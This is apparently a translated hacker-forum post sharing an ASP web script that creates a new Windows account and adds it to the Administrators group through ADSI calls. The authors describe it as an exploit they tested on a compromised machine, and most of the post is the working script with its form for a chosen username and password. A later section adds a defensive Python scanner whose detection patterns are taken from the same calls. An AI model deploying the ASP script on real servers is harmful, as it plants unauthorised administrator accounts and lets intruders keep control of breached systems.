.asp code that adds a super user [original by Blue Screen, improved by Kevin, unpublished MS vulnerability]
Author: Blue Screen, Kevin
Article source: Freezing Point Extreme
Actually, Kevin and I tested it on my broiler last week, and Hippo Epic. The result was that users of the Administrators group were successfully added under user permissions (although I can't believe my eyes).
Last time Kevin didn't say anything, so I didn't dare to post it... Now I saw him posting it on his blog, so I transferred it (it is a little better than when I tested it last time, and I added a form). Now I'm lucky for everyone.
Anyway, the code is correct, but it rarely succeeds; it depends on luck. Haha, next step I want to integrate it into the ocean. Hey-hey.
The code copy is as follows:
<%@ codepage=936 %>
<head>.network object script permission enhancement exploit tool</head>
<form action="useradd.asp" method="post">
User: <input name="username" type="text" value="kevin1986"><br>
Password: <input name="passwd" type="password"><br>
<input type="submit" value="Add">
</form>
<%
on error resume next
' Only requests from the local host are processed
if request.servervariables("REMOTE_ADDR") <> "127.0.0.1" then
    response.write "iP !s n0T RiGHt"
else
    if request("username") <> "" then
        username = request("username")
        passwd = request("passwd")
        Response.Expires = 0
        Session.TimeOut = 50
        Server.ScriptTimeout = 3000
        ' Bind to the local machine through the ADSI WinNT provider
        set lp = Server.createObject("WSCRIPT.NETWORK")
        oz = "WinNT://" & lp.ComputerName
        Set ob = GetObject(oz)
        Set oe = GetObject(oz & "/Administrators,group")
        ' Create the account, set its password and add it to Administrators
        Set od = ob.create("user", username)
        od.SetPassword passwd
        od.SetInfo
        oe.Add oz & "/" & username
        if err then
            response.write "Hey~~You should not buy 6+1 today... It's better to save 2 yuan to buy a bottle of Coke..."
        else
            ' Look at the output of "net user <username>" to check the result
            if instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user " & username).stdout.readall, "Last login") > 0 then
                response.write "Although there is no error, it seems that it has not been successfully established. You must be very depressed."
            else
                Response.write "OMG!" & username & "Account actually became! This is an unknown loophole. 5,000,000RMB is yours."
            end if
        end if
    else
        response.write "Please enter the username"
    end if
end if
%>
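For reviewing a web root, the calls in the listing above can be turned into a static check. The following is an added example, not part of the original post: it scores the server-side blocks of an ASP file against the ADSI and WScript calls the listing uses, after stripping whitespace and case so that spacing changes do not hide them. The function names, weights and threshold are assumptions made for this example.

```python
import re

# Indicator patterns come from the ASP listing on this page; the weights and
# threshold are assumptions made for this example.
INDICATORS = {
    "winnt_provider":     (r'"winnt://"', 2),
    "admins_group_bind":  (r'/administrators,group"', 3),
    "adsi_create_user":   (r'\.create\("user",', 3),
    "adsi_set_password":  (r'\.setpassword', 2),
    "group_add_member":   (r'\.add\w+&"/"&', 2),  # oe.Add oz&"/"&username
    "wscript_network":    (r'createobject\("wscript\.network"\)', 1),
    "wscript_shell_exec": (r'createobject\("wscript\.shell"\)\.exec\(', 2),
}
THRESHOLD = 8

def normalise(asp_source):
    """Join the <% ... %> blocks, drop all whitespace and lowercase the
    result, so spacing and case changes do not hide an indicator."""
    blocks = re.findall(r"<%(.*?)%>", asp_source, flags=re.S)
    return re.sub(r"\s+", "", "".join(blocks)).lower()

def scan(asp_source):
    """Return (score, sorted indicator names) for one ASP file's text."""
    code = normalise(asp_source)
    hits = [n for n, (pat, _) in INDICATORS.items() if re.search(pat, code)]
    return sum(INDICATORS[n][1] for n in hits), sorted(hits)

def is_suspicious(asp_source):
    return scan(asp_source)[0] >= THRESHOLD

# Constructed sample: the account-creation calls as they appear in the listing.
SAMPLE_ADDUSER = '''<%
set lp=Server.createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user",username)
od.SetPassword passwd
od.SetInfo
oe.Add oz&"/"&username
%>'''
# Constructed benign sample: WScript.Network used only to show the host name.
SAMPLE_BENIGN = '''<%
Set net = Server.CreateObject("WScript.Network")
Response.Write Server.HTMLEncode(net.ComputerName)
%>'''

if __name__ == "__main__":
    print(scan(SAMPLE_ADDUSER), scan(SAMPLE_BENIGN))
```

A file that scores at or above the threshold is a candidate for manual review, not a verdict; legitimate administration pages can use the same ADSI calls.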